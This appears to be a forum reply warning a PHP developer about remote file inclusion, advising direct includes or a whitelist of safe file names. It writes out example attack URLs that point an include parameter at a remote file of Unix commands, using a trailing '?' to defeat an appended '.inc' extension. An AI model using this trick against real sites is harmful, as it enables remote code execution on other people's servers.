ASDx

if someone icluded a file from a remote website followed by ? it it wll completely igonre anything after they dangerous code for example http://www.wickham43.com/test/php-show-form.phpf=http://s.rr/php_with_some_unix_commands.txt? it will be http://www.wickham43.com/test/php-show-form.php?f=http://h.sr/php_with_some_unix_commands.txt?.inc and everything after ? is ignored so your .inc is will be treated as a part of the query string.

i was just surfing and i saw your question .... and i want t advice you think if someone discover your url and changed it to this http://www.wickham43.com/test/php-show-form.php?f=dangercode.gif? you will be hacked directly ... so you have to include your file instantly not to get it from the fly or use an array of the safe file names to be included .